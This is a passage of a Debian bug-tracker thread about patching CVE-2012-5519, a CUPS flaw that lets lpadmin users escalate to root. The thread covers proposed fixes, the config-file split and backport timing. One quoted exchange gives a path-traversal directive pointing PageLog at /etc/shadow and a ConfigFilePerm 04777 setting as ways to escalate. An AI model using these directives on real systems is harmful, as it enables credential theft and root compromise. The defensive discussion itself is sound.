[2] http://bugs.debian.org/cgi-bin/bugreport.cgi?msg=131;filename=alt-CVE-2012-5519.patch;att=1;bug=692791
[signature.asc (application/pgp-signature, inline)]

Information forwarded to debian-bugs-dist@lists.debian.org, Debian CUPS Maintainers <pkg-cups-devel@lists.alioth.debian.org>:
Bug#692791; Package cups. (Thu, 29 Nov 2012 12:27:05 GMT) Full text and rfc822 format available.

Acknowledgement sent to Marc Deslauriers <marc.deslauriers@canonical.com>:
Extra info received and forwarded to list. Copy sent to Debian CUPS Maintainers <pkg-cups-devel@lists.alioth.debian.org>. (Thu, 29 Nov 2012 12:27:05 GMT) Full text and rfc822 format available.

Message #161 received at 692791@bugs.debian.org (full text, mbox):

From: Marc Deslauriers <marc.deslauriers@canonical.com>
To: Didier 'OdyX' Raboud <odyx@debian.org>
Cc: 692791@bugs.debian.org, Michael Sweet <msweet@apple.com>, team@security.debian.org, debian-release@lists.debian.org
Subject: Re: #692791 - CVE-2012-5519 - cups lpadmin-to-root privilege escalation - Proposed solutions
Date: Thu, 29 Nov 2012 07:22:44 -0500
[Message part 1 (text/plain, inline)]
On 12-11-29 05:30 AM, Didier 'OdyX' Raboud wrote:
<snip>
> B) Disable any remote configuration by lpadmin users
> 
> This has been attempted by Marc on [1]. For now, it is incomplete as it still
> allows lpadmin users to HTTP PUT updates to the configuration files.
> 
> Pros: + Addresses the problem in a way less intrusive way (smaller patch)
> Cons: - Big loss of functionality through forbidding any lpadmin cups server
>         configuration
<snip>
> 
> So, for squeeze/stable and wheezy/next-stable, I'd be tempted to go the B)
> (to be fixed) way. Granted, we'll loose functionality, but it will put us on
> the safe-side, with updates that drop functionality without needing a painful
> configuration-files-edit upgrading path.
> 

I don't believe B is a viable approach. The HTTP PUT interface is used
by cupsctl and possibly other local tools, and there's no easy way of
filtering what gets uploaded in the cupsd.conf file.

FYI, in Ubuntu, I plan on doing a less-elegant version of A, which would
be to get the new config file, but without automatically migrating any
settings, and without changing the original config file so the user
doesn't get any debconf prompts. Options that got moved to the new file
would print warnings in the logs for the admin to see. The only thing is
that the "SystemGroup" line will still be in the original config file
after the upgrade, but with the log file warning disabled for it.

Marc.



[signature.asc (application/pgp-signature, attachment)]

Information forwarded to debian-bugs-dist@lists.debian.org, Debian CUPS Maintainers <pkg-cups-devel@lists.alioth.debian.org>:
Bug#692791; Package cups. (Thu, 29 Nov 2012 15:12:05 GMT) Full text and rfc822 format available.

Acknowledgement sent to Michael Sweet <msweet@apple.com>:
Extra info received and forwarded to list. Copy sent to Debian CUPS Maintainers <pkg-cups-devel@lists.alioth.debian.org>. (Thu, 29 Nov 2012 15:12:06 GMT) Full text and rfc822 format available.

Message #166 received at 692791@bugs.debian.org (full text, mbox):

From: Michael Sweet <msweet@apple.com>
To: Didier 'OdyX' Raboud <odyx@debian.org>
Cc: "692791@bugs.debian.org" <692791@bugs.debian.org>, Marc Deslauriers <marc.deslauriers@canonical.com>
Subject: Re: Bug#692791: members of lpadmin can read every file on server via cups
Date: Thu, 29 Nov 2012 09:59:25 -0500
[Message part 1 (text/plain, inline)]
Didier,

On 2012-11-28, at 6:58 AM, Didier 'OdyX' Raboud <odyx@debian.org> wrote:
> ...
> DocumentRoot has to be fixed that way IMHO as the attack is immediate and I 
> think it's a suitable fix for our stable releases. For SystemGroup, I think 
> it's reasonably okay to leave that bug open for stable releases; the long-term 
> fix (to push that to cups-files.conf) is okay in that regard.
> 
> Any idea/patch on how you'd enforce default DocumentRoot (including making 
> sure the tests still run? )?


One simple check: if we are running as root, require the defaults.

________________________________________________________________________
Michael Sweet, Senior Printing System Engineer, PWG Chair

[Message part 2 (text/html, inline)]

Information forwarded to debian-bugs-dist@lists.debian.org, Debian CUPS Maintainers <pkg-cups-devel@lists.alioth.debian.org>:
Bug#692791; Package cups. (Thu, 29 Nov 2012 15:15:03 GMT) Full text and rfc822 format available.

Acknowledgement sent to Michael Sweet <msweet@apple.com>:
Extra info received and forwarded to list. Copy sent to Debian CUPS Maintainers <pkg-cups-devel@lists.alioth.debian.org>. (Thu, 29 Nov 2012 15:15:03 GMT) Full text and rfc822 format available.

Message #171 received at 692791@bugs.debian.org (full text, mbox):

From: Michael Sweet <msweet@apple.com>
To: Marc Deslauriers <marc.deslauriers@canonical.com>
Cc: 692791@bugs.debian.org
Subject: Re: Bug#692791: members of lpadmin can read every file on server via cups
Date: Thu, 29 Nov 2012 10:12:42 -0500
Marc,

On 2012-11-28, at 9:00 AM, Marc Deslauriers <marc.deslauriers@canonical.com> wrote:
> On 12-11-27 11:38 PM, Michael Sweet wrote:
>> After looking at this patch in detail, it doesn't actually prevent users in the lpadmin group from modifying cupsd.conf and performing the specified privilege escalation.
>> 
>> An alternate fix for cups-1.5 and earlier that specifically addresses the reported problem by requiring the log files to reside in CUPS_LOGDIR:
>> 
> 
> Thanks for taking a look at it Michael. I now see what you meant by
> needing to disable HTTP PUT in cupsd.
> 
> So, your alternate fix doesn't actually solve the problem as I can still
> do something like:
> 
> PageLog /var/log/cups/../../../etc/shadow

Adding a check for "../" in the path will catch that, easy fix...

> Also, there are a lot of other directives that can pretty trivially
> escalate to root...for example, setting ConfigFilePerm to 04777...

Well, that would yield a world-writable cupsd.conf; I'll update things to mask out everything but read/write bits for both ConfigFilePerm and LogFilePerm.

________________________________________________________________________
Michael Sweet, Senior Printing System Engineer, PWG Chair




Information forwarded to debian-bugs-dist@lists.debian.org, Debian CUPS Maintainers <pkg-cups-devel@lists.alioth.debian.org>:
Bug#692791; Package cups. (Thu, 29 Nov 2012 15:21:04 GMT) Full text and rfc822 format available.

Acknowledgement sent to Marc Deslauriers <marc.deslauriers@canonical.com>:
Extra info received and forwarded to list. Copy sent to Debian CUPS Maintainers <pkg-cups-devel@lists.alioth.debian.org>. (Thu, 29 Nov 2012 15:21:04 GMT) Full text and rfc822 format available.

Message #176 received at 692791@bugs.debian.org (full text, mbox):

From: Marc Deslauriers <marc.deslauriers@canonical.com>
To: Michael Sweet <msweet@apple.com>
Cc: 692791@bugs.debian.org
Subject: Re: Bug#692791: members of lpadmin can read every file on server via cups
Date: Thu, 29 Nov 2012 10:19:04 -0500
Michael,

On 12-11-29 10:12 AM, Michael Sweet wrote:
>> So, your alternate fix doesn't actually solve the problem as I can still
>> do something like:
>>
>> PageLog /var/log/cups/../../../etc/shadow
> 
> Adding a check for "../" in the path will catch that, easy fix...
> 
>> Also, there are a lot of other directives that can pretty trivially
>> escalate to root...for example, setting ConfigFilePerm to 04777...
> 
> Well, that would yield a world-writable cupsd.conf; I'll update things to mask out everything but read/write bits for both ConfigFilePerm and LogFilePerm.

We'll most likely be using your approach of splitting the config files
out in our stable releases, so I don't think it's worth investing time
in trying to find an alternative fix.

Thanks!

Marc.





Information forwarded to debian-bugs-dist@lists.debian.org, Debian CUPS Maintainers <pkg-cups-devel@lists.alioth.debian.org>:
Bug#692791; Package cups. (Fri, 30 Nov 2012 10:27:03 GMT) Full text and rfc822 format available.

Acknowledgement sent to "Didier 'OdyX' Raboud" <odyx@debian.org>:
Extra info received and forwarded to list. Copy sent to Debian CUPS Maintainers <pkg-cups-devel@lists.alioth.debian.org>. (Fri, 30 Nov 2012 10:27:03 GMT) Full text and rfc822 format available.

Message #181 received at 692791@bugs.debian.org (full text, mbox):

From: "Didier 'OdyX' Raboud" <odyx@debian.org>
To: 692791@bugs.debian.org
Cc: Marc Deslauriers <marc.deslauriers@canonical.com>, Michael Sweet <msweet@apple.com>, team@security.debian.org, debian-release@lists.debian.org
Subject: Re: #692791 - CVE-2012-5519 - cups lpadmin-to-root privilege escalation - Proposed solutions
Date: Fri, 30 Nov 2012 11:26:12 +0100
[Message part 1 (text/plain, inline)]
Le jeudi, 29 novembre 2012 11.30:25, Didier 'OdyX' Raboud a écrit :
> A) Move configuration stanzas from cupsd.conf to cups-files.conf

Attached would be the patch against 1.5.3, the version targetted at wheezy, 
please review.

Cheers,

OdyX
[split-configuration-files-STR4223.patch (text/x-patch, attachment)]

Reply sent to Didier Raboud <odyx@debian.org>:
You have taken responsibility. (Tue, 04 Dec 2012 12:21:07 GMT) Full text and rfc822 format available.

Notification sent to Jörg Ludwig <joerg.ludwig@iserv.eu>:
Bug acknowledged by developer. (Tue, 04 Dec 2012 12:21:07 GMT) Full text and rfc822 format available.

Message #186 received at 692791-close@bugs.debian.org (full text, mbox):

From: Didier Raboud <odyx@debian.org>
To: 692791-close@bugs.debian.org
Subject: Bug#692791: fixed in cups 1.5.3-2.7
Date: Tue, 04 Dec 2012 12:17:52 +0000
Source: cups
Source-Version: 1.5.3-2.7

We believe that the bug you reported is fixed in the latest version of
cups, which is due to be installed in the Debian FTP archive.

A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 692791@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Didier Raboud <odyx@debian.org> (supplier of updated cups package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmaster@debian.org)


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

Format: 1.8
Date: Tue, 04 Dec 2012 12:13:14 +0100
Source: cups
Binary: libcups2 libcupsimage2 libcupscgi1 libcupsdriver1 libcupsmime1 libcupsppdc1 cups cups-client libcups2-dev libcupsimage2-dev libcupscgi1-dev libcupsdriver1-dev libcupsmime1-dev libcupsppdc1-dev cups-bsd cups-common cups-ppdc cups-dbg cupsddk
Architecture: source all amd64
Version: 1.5.3-2.7
Distribution: unstable
Urgency: low
Maintainer: Debian Printing Team <debian-printing@lists.debian.org>
Changed-By: Didier Raboud <odyx@debian.org>
Description: 
 cups       - Common UNIX Printing System(tm) - server
 cups-bsd   - Common UNIX Printing System(tm) - BSD commands
 cups-client - Common UNIX Printing System(tm) - client programs (SysV)
 cups-common - Common UNIX Printing System(tm) - common files
 cups-dbg   - Common UNIX Printing System(tm) - debugging symbols
 cups-ppdc  - Common UNIX Printing System(tm) - PPD manipulation utilities
 cupsddk    - Common UNIX Printing System (transitional package)
 libcups2   - Common UNIX Printing System(tm) - Core library
 libcups2-dev - Common UNIX Printing System(tm) - Development files CUPS library
 libcupscgi1 - Common UNIX Printing System(tm) - CGI library
 libcupscgi1-dev - Common UNIX Printing System(tm) - Development files for CGI libra
 libcupsdriver1 - Common UNIX Printing System(tm) - Driver library
 libcupsdriver1-dev - Common UNIX Printing System(tm) - Development files driver librar
 libcupsimage2 - Common UNIX Printing System(tm) - Raster image library
 libcupsimage2-dev - Common UNIX Printing System(tm) - Development files CUPS image li
 libcupsmime1 - Common UNIX Printing System(tm) - MIME library
 libcupsmime1-dev - Common UNIX Printing System(tm) - Development files MIME library
 libcupsppdc1 - Common UNIX Printing System(tm) - PPD manipulation library
 libcupsppdc1-dev - Common UNIX Printing System(tm) - Development files PPD library
Closes: 692791
Changes: 
 cups (1.5.3-2.7) unstable; urgency=low
 .
   * Backport upstream configuration files split to address CVE-2012-5519.
     - Add split-configuration-files-STR4223.patch
     - Refresh affected patches:
      - cups-deviced-allow-device-ids-with-newline.patch
      - default_log_settings.patch
      - pidfile.patch
      - reactivate_recommended_driver.patch
      - removecvstag.patch
      - tests-ignore-usb-crash.patch
     - Install the new cups-files.conf
     Fixes: CVE-2012-5519 (Closes: #692791)
   * Make cupsd.conf a non-conffile, as it is managed by cups itself.
     - On new installs, set it up from cupsd.conf.default.
     - On upgrades, move it away in preinst and move it back in postinst.
     - On aborted upgrades, move the file back in place.
   * Document the split in cups.NEWS.
   * Update translations for new manpage, install it.
   * Put under Debian Printing Team umbrella.
Checksums-Sha1: 
 26eb4f3ecd3365337baa319e333ef3feac3df312 3256 cups_1.5.3-2.7.dsc
 1c2f9e3b0dc74bf25a2cd1f0b171b614dada6418 368307 cups_1.5.3-2.7.debian.tar.gz
 2e1a754bcc9ed101cc5fb525c3a23e53d2dfc5e4 902018 cups-common_1.5.3-2.7_all.deb
 a0c4e366c519379f3d03f782278146a768313c58 85590 cupsddk_1.5.3-2.7_all.deb
 0f59305679c60a0eab75fd6ede0873a1cbdf9a71 254474 libcups2_1.5.3-2.7_amd64.deb
 70083237058a5f5c3f3c3819d5096dfb790bbffe 136482 libcupsimage2_1.5.3-2.7_amd64.deb
 89917085799675485d72777ca0640e86a3d7bd18 114974 libcupscgi1_1.5.3-2.7_amd64.deb
 89891d78666ddf2cd0524f0ae953c6549c926963 103018 libcupsdriver1_1.5.3-2.7_amd64.deb
 6aa43ff47c4e7378dfed7558f0a350c3bc9608f7 97916 libcupsmime1_1.5.3-2.7_amd64.deb
 2e4ef2afcdcb52d6a99b8c4f0053efebd4a7f7fb 137966 libcupsppdc1_1.5.3-2.7_amd64.deb
 63af729ab756749f7b93168bcbf5de09c2c263e9 1383924 cups_1.5.3-2.7_amd64.deb
 f21c28ea0e0b882bfc81b1d6a5fb00adcdc420d8 180228 cups-client_1.5.3-2.7_amd64.deb
 2b8d0e685862449e2715bf988fdb4ebeb1935da0 326202 libcups2-dev_1.5.3-2.7_amd64.deb
 5f08f140e99aca2c236c7689ac87d1aa8b28cf4d 65314 libcupsimage2-dev_1.5.3-2.7_amd64.deb
 e7fb2214027296208ed3d6fc256f7c064bfe1387 120750 libcupscgi1-dev_1.5.3-2.7_amd64.deb
 5e7fed37c52cc7e00d8a5524ce67d3d1da48a218 105970 libcupsdriver1-dev_1.5.3-2.7_amd64.deb
 905a97e5ab04822031a7287c3aca60f22bd499c5 98740 libcupsmime1-dev_1.5.3-2.7_amd64.deb
 d7753f35bb5a33030be709e70842712c95f78dfc 155210 libcupsppdc1-dev_1.5.3-2.7_amd64.deb
 6c7c005e9c85f64e52532146aa8d9a1e4c18857f 45606 cups-bsd_1.5.3-2.7_amd64.deb
 241a5d52cdad9bf382fa67bf1102e8c2122885a2 115328 cups-ppdc_1.5.3-2.7_amd64.deb
 3b83c365534c4250f6c6dcd3f89ae2d4cffacb60 2212234 cups-dbg_1.5.3-2.7_amd64.deb
Checksums-Sha256: 
 aba2349053142997393e0ce2a1a2facd6982558d9b44cb11de9f124bf8d64787 3256 cups_1.5.3-2.7.dsc
 c1647f43fab5207c85fb6e9c2c00e836242e125b6a2ab4b765e8b30458c4d6fc 368307 cups_1.5.3-2.7.debian.tar.gz
 e78b900288274c1e14d4fe9d5882f295db38226aa0b72e727e2dbfd76cd5b2c2 902018 cups-common_1.5.3-2.7_all.deb
 e120c71043772a875af8f9b7afd36901af90679137ec95e50beb8f3d8568c128 85590 cupsddk_1.5.3-2.7_all.deb
 80b5990ad290bf3f1204b62e5a879d6018605985c03ba46e4f42ac889fcdffed 254474 libcups2_1.5.3-2.7_amd64.deb
 f42112e9d240e379b45a9012e646888f31f3c297e2fed3231be52c5cbfbfec72 136482 libcupsimage2_1.5.3-2.7_amd64.deb
 2cc762f7183801581fdf09cb1e8912b0f647fc6aba1915a21914651152251755 114974 libcupscgi1_1.5.3-2.7_amd64.deb
 31cedf183787f63209ea75189f30e3afa8d91a8a88f36ef6ea4fcf9d6bd02acb 103018 libcupsdriver1_1.5.3-2.7_amd64.deb
 51fdf601842f2474fc3812af4d07e1d520a78201b62d48e9e840dd60f808c798 97916 libcupsmime1_1.5.3-2.7_amd64.deb
 95f7690cb39696eccb285c8356dd8347562cccbba7358482131e3b03676742f9 137966 libcupsppdc1_1.5.3-2.7_amd64.deb
 a93317a3074e96b87984c3772395bf6d6a0211b6ab1f03a782abdc2a1aa06ee1 1383924 cups_1.5.3-2.7_amd64.deb
 bf8989ebccdddd2208b39c43bba071f76e4c517e4d9f0d94c5eb9d4fd831472b 180228 cups-client_1.5.3-2.7_amd64.deb
 05efa4aaa2230bead36e331ab28c46dda9725e1cb398e7f552d18288b432e825 326202 libcups2-dev_1.5.3-2.7_amd64.deb
 bd06db39f63bb243327509da120d3848072ebec2f887721c6f7614abbadd84ff 65314 libcupsimage2-dev_1.5.3-2.7_amd64.deb
 69b54a25753209fcb9241cf433b68dc944fd8e672f242516cc7f085bde5ee257 120750 libcupscgi1-dev_1.5.3-2.7_amd64.deb
 32efa40e7f146ff981633e2f08be64c62a9c364c3075be13113a48e93e8074f6 105970 libcupsdriver1-dev_1.5.3-2.7_amd64.deb
 36e262cb5ab072c8c3a54418e43a27e6a65f05b6c1a5e3432dfea36dfe1830cf 98740 libcupsmime1-dev_1.5.3-2.7_amd64.deb
 145890d5986bf0e61dbe6771e1cfd8e0c4c79399dd2d743acc13e39f6c60499a 155210 libcupsppdc1-dev_1.5.3-2.7_amd64.deb
 6f7c350725ce9011e39cc2a5e4b4e47c7153fffddada61331d1ef8e519bca82f 45606 cups-bsd_1.5.3-2.7_amd64.deb
 240a8f2843c1973dcc8ea47c06fc6d3d3c4f3551172a5d08af8e507e9949e2a7 115328 cups-ppdc_1.5.3-2.7_amd64.deb
 3a59c3298991bccab1edd8ae3a88bab2f64fb8e4257b6d2a6fd6a0dc835399d7 2212234 cups-dbg_1.5.3-2.7_amd64.deb
Files: 
 2abe7f2c89535bc5f9a10d09bbaa452c 3256 net optional cups_1.5.3-2.7.dsc
 2c4bcd2cd5f01d1864a1ae49237b1315 368307 net optional cups_1.5.3-2.7.debian.tar.gz
 3c3809251fe1276e4f39d9ede615ce87 902018 net optional cups-common_1.5.3-2.7_all.deb
 4d849b912caac8fc049530556a4f13fe 85590 oldlibs extra cupsddk_1.5.3-2.7_all.deb
 03b39656f5cd8c770cd98904661b6b27 254474 libs optional libcups2_1.5.3-2.7_amd64.deb
 890405a4932940e0c1ed592bf94ae4c8 136482 libs optional libcupsimage2_1.5.3-2.7_amd64.deb
 ccb6e4c4ef0cce170eb4d9c31843c305 114974 libs optional libcupscgi1_1.5.3-2.7_amd64.deb
 bb4896865f95e4c3469c1841ddf6fe3a 103018 libs optional libcupsdriver1_1.5.3-2.7_amd64.deb
 487c6fd285e00bade24a491d1b449b21 97916 libs optional libcupsmime1_1.5.3-2.7_amd64.deb
 700f99c7f0c7e9fa780317d63d48acbb 137966 libs optional libcupsppdc1_1.5.3-2.7_amd64.deb
 edde59a4f56e4b1748af78ddd3339459 1383924 net optional cups_1.5.3-2.7_amd64.deb
 f32cacf1845c0027615ce96242900551 180228 net optional cups-client_1.5.3-2.7_amd64.deb
 c3c68bac531f3587c272f1415017604b 326202 libdevel optional libcups2-dev_1.5.3-2.7_amd64.deb
 ce0ab4c99f00891f1fe8dd4b1b013d82 65314 libdevel optional libcupsimage2-dev_1.5.3-2.7_amd64.deb
 a0943249aa687916d72fe7066f8cee4b 120750 libdevel optional libcupscgi1-dev_1.5.3-2.7_amd64.deb
 7306e888d603f59fa88de49853207f1c 105970 libdevel optional libcupsdriver1-dev_1.5.3-2.7_amd64.deb
 3d1c185a1863b12b1aec71510860a15d 98740 libdevel optional libcupsmime1-dev_1.5.3-2.7_amd64.deb
 9f3d4ad6c67e5fe70c9a15227f5125eb 155210 libdevel optional libcupsppdc1-dev_1.5.3-2.7_amd64.deb
 e1dca0a163ee63b5d706f6bbad3fce11 45606 net extra cups-bsd_1.5.3-2.7_amd64.deb
 8eff7344c5aeb0669094839fb8cb69ec 115328 utils optional cups-ppdc_1.5.3-2.7_amd64.deb
 75db84ec75c3860a49893deff9c37542 2212234 debug extra cups-dbg_1.5.3-2.7_amd64.deb

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.12 (GNU/Linux)

iQGcBAEBCAAGBQJQveZuAAoJEIvPpx7KFjRV/E8L+gLyWjTrMYlW7cT48jtWW8bY
KddY6NObhxLL2jQL6jmAIF4w7QLONYk1bretCoxw7EaHTs6TkkIYqF6J52aMKqEy
AdOGlSE/obeyPBOL/h75QsOeN4rUdbPtZk47sbTV2CW2kcT9S5Qyz/Y9I3k6zWqf
6Kn+93SFEMzQ1oQEzMebuNf3dDGCfIAGa6kUesyxd9c7N26d7n1eqvEyMidiobCB
6O1lsRV6iOMgsC3Pk45AO7kLvBEFO5f8h8TTU5xLaI03iFIz0cwAqFKwcA6GBHdH
1hclcjj6eFaP37AHItqnvdSN5nvf1CdqIDlrNfVo3WFLnoOagfWHgN/LMQOQmBO4
9YKO9EMFhop4GbkF95NMJb5QXu5Bt9NVjYe3zhSdV4aSxV8RTZ/xEJPJjE+t9Uzj
zMWHkVeQfSXzcfFMk2ckcpr2T/hKiLSZvkZpXE7/XtlgMz37a0S7qoy8oGODtgEC
BTYzzu/YzwfA9JQ1voxd4JzIuhrNTzU8gwuJ+g4Mtg==
=wtIc
-----END PGP SIGNATURE-----




Information forwarded to debian-bugs-dist@lists.debian.org, Debian CUPS Maintainers <pkg-cups-devel@lists.alioth.debian.org>:
Bug#692791; Package cups. (Sat, 08 Dec 2012 01:00:03 GMT) Full text and rfc822 format available.

Acknowledgement sent to "Didier 'OdyX' Raboud" <odyx@debian.org>:
Extra info received and forwarded to list. Copy sent to Debian CUPS Maintainers <pkg-cups-devel@lists.alioth.debian.org>. (Sat, 08 Dec 2012 01:00:03 GMT) Full text and rfc822 format available.

Message #191 received at 692791@bugs.debian.org (full text, mbox):

From: "Didier 'OdyX' Raboud" <odyx@debian.org>
To: 692791@bugs.debian.org, team@security.debian.org
Subject: #692791: CVE-2012-5519 Security update towards Squeeze ?
Date: Sat, 8 Dec 2012 01:58:46 +0100
[Message part 1 (text/plain, inline)]
Hi dear security team,

I propose to get CVE-2012-5519 (#692791) fixed with the attached debdiff.

It is a backport of the patches discussed on the upstream bug [#4223] for cups 
1.4.4, plus the needed packaging changes to make /etc/cups/cupsd.conf not a 
configuration file anymore.

Note that contrary to what was done in unstable, the patch is added last, not 
first.

Please advise, cheers,

OdyX

[#4223](https://www.cups.org/str.php?L4223)
[cups_1.4.4-7+squeeze2~OdyX0.debdiff (text/x-patch, attachment)]

Information forwarded to debian-bugs-dist@lists.debian.org, Debian CUPS Maintainers <pkg-cups-devel@lists.alioth.debian.org>:
Bug#692791; Package cups. (Sat, 08 Dec 2012 08:15:03 GMT) Full text and rfc822 format available.

Acknowledgement sent to Yves-Alexis Perez <corsac@debian.org>:
Extra info received and forwarded to list. Copy sent to Debian CUPS Maintainers <pkg-cups-devel@lists.alioth.debian.org>. (Sat, 08 Dec 2012 08:15:03 GMT) Full text and rfc822 format available.

Message #196 received at 692791@bugs.debian.org (full text, mbox):

From: Yves-Alexis Perez <corsac@debian.org>
To: Didier 'OdyX' Raboud <odyx@debian.org>
Cc: 692791@bugs.debian.org, team@security.debian.org
Subject: Re: #692791: CVE-2012-5519 Security update towards Squeeze ?
Date: Sat, 08 Dec 2012 09:12:20 +0100
On sam., 2012-12-08 at 01:58 +0100, Didier 'OdyX' Raboud wrote:
> Hi dear security team,
> 
> I propose to get CVE-2012-5519 (#692791) fixed with the attached debdiff.
> 
> It is a backport of the patches discussed on the upstream bug [#4223] for cups 
> 1.4.4, plus the needed packaging changes to make /etc/cups/cupsd.conf not a 
> configuration file anymore.
> 
> Note that contrary to what was done in unstable, the patch is added last, not 
> first.

To be honest, considering how invasive the patch is, I'd like it to stay
a bit in unstable. There already have been few correction in sid, so in
case there are more, it's better to include the relevant bits at first.

Regards,

-- 
Yves-Alexis



Information forwarded to debian-bugs-dist@lists.debian.org, Debian CUPS Maintainers <pkg-cups-devel@lists.alioth.debian.org>:
Bug#692791; Package cups. (Sat, 08 Dec 2012 10:36:03 GMT) Full text and rfc822 format available.

Acknowledgement sent to Didier Raboud <odyx@debian.org>:
Extra info received and forwarded to list. Copy sent to Debian CUPS Maintainers <pkg-cups-devel@lists.alioth.debian.org>. (Sat, 08 Dec 2012 10:36:03 GMT) Full text and rfc822 format available.

Message #201 received at 692791@bugs.debian.org (full text, mbox):

From: Didier Raboud <odyx@debian.org>
To: "Yves-Alexis Perez" <corsac@debian.org>, 692791@bugs.debian.org
Cc: team@security.debian.org
Subject: Re: Bug#692791: #692791: CVE-2012-5519 Security update towards Squeeze ?
Date: Sat, 8 Dec 2012 11:32:57 +0100
Le samedi, 8 décembre 2012 09.12:20, Yves-Alexis Perez a écrit :
> On sam., 2012-12-08 at 01:58 +0100, Didier 'OdyX' Raboud wrote:
> > 
> > I propose to get CVE-2012-5519 (#692791) fixed with the attached debdiff.
> > 
> To be honest, considering how invasive the patch is, I'd like it to stay
> a bit in unstable. There already have been few correction in sid, so in
> case there are more, it's better to include the relevant bits at first.

Sure! My intent was just to make the 1.4.4 backport of the patch public, not 
necessarily to have it released immediately.

That said, who triggers the re-examination of the patch for security release? 

OdyX



Information forwarded to debian-bugs-dist@lists.debian.org, Debian CUPS Maintainers <pkg-cups-devel@lists.alioth.debian.org>:
Bug#692791; Package cups. (Sat, 08 Dec 2012 11:27:05 GMT) Full text and rfc822 format available.

Acknowledgement sent to Yves-Alexis Perez <corsac@debian.org>:
Extra info received and forwarded to list. Copy sent to Debian CUPS Maintainers <pkg-cups-devel@lists.alioth.debian.org>. (Sat, 08 Dec 2012 11:27:05 GMT) Full text and rfc822 format available.

Message #206 received at 692791@bugs.debian.org (full text, mbox):

From: Yves-Alexis Perez <corsac@debian.org>
To: Didier Raboud <odyx@debian.org>
Cc: 692791@bugs.debian.org, team@security.debian.org
Subject: Re: Bug#692791: #692791: CVE-2012-5519 Security update towards Squeeze ?
Date: Sat, 08 Dec 2012 12:26:05 +0100
On sam., 2012-12-08 at 11:32 +0100, Didier Raboud wrote:
> Le samedi, 8 décembre 2012 09.12:20, Yves-Alexis Perez a écrit :
> > On sam., 2012-12-08 at 01:58 +0100, Didier 'OdyX' Raboud wrote:
> > > 
> > > I propose to get CVE-2012-5519 (#692791) fixed with the attached debdiff.
> > > 
> > To be honest, considering how invasive the patch is, I'd like it to stay
> > a bit in unstable. There already have been few correction in sid, so in
> > case there are more, it's better to include the relevant bits at first.
> 
> Sure! My intent was just to make the 1.4.4 backport of the patch public, not 
> necessarily to have it released immediately.

Ok.
> 
> That said, who triggers the re-examination of the patch for security release? 

What do you mean?

-- 
Yves-Alexis



Information forwarded to debian-bugs-dist@lists.debian.org, Debian CUPS Maintainers <pkg-cups-devel@lists.alioth.debian.org>:
Bug#692791; Package cups. (Sat, 08 Dec 2012 12:45:05 GMT) Full text and rfc822 format available.

Acknowledgement sent to "Didier 'OdyX' Raboud" <odyx@debian.org>:
Extra info received and forwarded to list. Copy sent to Debian CUPS Maintainers <pkg-cups-devel@lists.alioth.debian.org>. (Sat, 08 Dec 2012 12:45:05 GMT) Full text and rfc822 format available.

Message #211 received at 692791@bugs.debian.org (full text, mbox):

From: "Didier 'OdyX' Raboud" <odyx@debian.org>
To: "Yves-Alexis Perez" <corsac@debian.org>
Cc: 692791@bugs.debian.org, team@security.debian.org
Subject: Re: Bug#692791: #692791: CVE-2012-5519 Security update towards Squeeze ?
Date: Sat, 8 Dec 2012 13:43:43 +0100
Le samedi, 8 décembre 2012 12.26:05, Yves-Alexis Perez a écrit :
> > That said, who triggers the re-examination of the patch for security
> > release?
> 
> What do you mean?

> I'd like it to stay a bit in unstable

#define "a bit" ?

I was just wondering about who would decide when it would be "the good time". 
I guess I'll ping the bug around when the unstable patch would have reached 
wheezy.

Cheers,

OdyX



Information forwarded to debian-bugs-dist@lists.debian.org, Debian CUPS Maintainers <pkg-cups-devel@lists.alioth.debian.org>:
Bug#692791; Package cups. (Sat, 08 Dec 2012 13:09:03 GMT) Full text and rfc822 format available.

Acknowledgement sent to Yves-Alexis Perez <corsac@debian.org>:
Extra info received and forwarded to list. Copy sent to Debian CUPS Maintainers <pkg-cups-devel@lists.alioth.debian.org>. (Sat, 08 Dec 2012 13:09:03 GMT) Full text and rfc822 format available.

Message #216 received at 692791@bugs.debian.org (full text, mbox):

From: Yves-Alexis Perez <corsac@debian.org>
To: Didier 'OdyX' Raboud <odyx@debian.org>
Cc: 692791@bugs.debian.org, team@security.debian.org
Subject: Re: Bug#692791: #692791: CVE-2012-5519 Security update towards Squeeze ?
Date: Sat, 08 Dec 2012 14:04:40 +0100
On sam., 2012-12-08 at 13:43 +0100, Didier 'OdyX' Raboud wrote:
> Le samedi, 8 décembre 2012 12.26:05, Yves-Alexis Perez a écrit :
> > > That said, who triggers the re-examination of the patch for
> security
> > > release?
> > 
> > What do you mean?
> 
> > I'd like it to stay a bit in unstable
> 
> #define "a bit" ?
> 
> I was just wondering about who would decide when it would be "the good
> time". 
> I guess I'll ping the bug around when the unstable patch would have
> reached 
> wheezy.

Yes, I guess that if/when RT team decides it's good enough for Wheezy we
can reevaluate the situation.

Thanks for your work, and regards,
-- 
Yves-Alexis Perez
 Debian Security




Information forwarded to debian-bugs-dist@lists.debian.org, Debian CUPS Maintainers <pkg-cups-devel@lists.alioth.debian.org>:
Bug#692791; Package cups. (Thu, 27 Dec 2012 20:03:02 GMT) Full text and rfc822 format available.

Acknowledgement sent to Moritz Mühlenhoff <jmm@inutil.org>:
Extra info received and forwarded to list. Copy sent to Debian CUPS Maintainers <pkg-cups-devel@lists.alioth.debian.org>. (Thu, 27 Dec 2012 20:03:03 GMT) Full text and rfc822 format available.

Message #221 received at 692791@bugs.debian.org (full text, mbox):

From: Moritz Mühlenhoff <jmm@inutil.org>
To: Didier Raboud <odyx@debian.org>
Cc: Yves-Alexis Perez <corsac@debian.org>, 692791@bugs.debian.org, team@security.debian.org
Subject: Re: Bug#692791: #692791: CVE-2012-5519 Security update towards Squeeze ?
Date: Thu, 27 Dec 2012 20:43:12 +0100
On Sat, Dec 08, 2012 at 11:32:57AM +0100, Didier Raboud wrote:
> Le samedi, 8 décembre 2012 09.12:20, Yves-Alexis Perez a écrit :
> > On sam., 2012-12-08 at 01:58 +0100, Didier 'OdyX' Raboud wrote:
> > > 
> > > I propose to get CVE-2012-5519 (#692791) fixed with the attached debdiff.
> > > 
> > To be honest, considering how invasive the patch is, I'd like it to stay
> > a bit in unstable. There already have been few correction in sid, so in
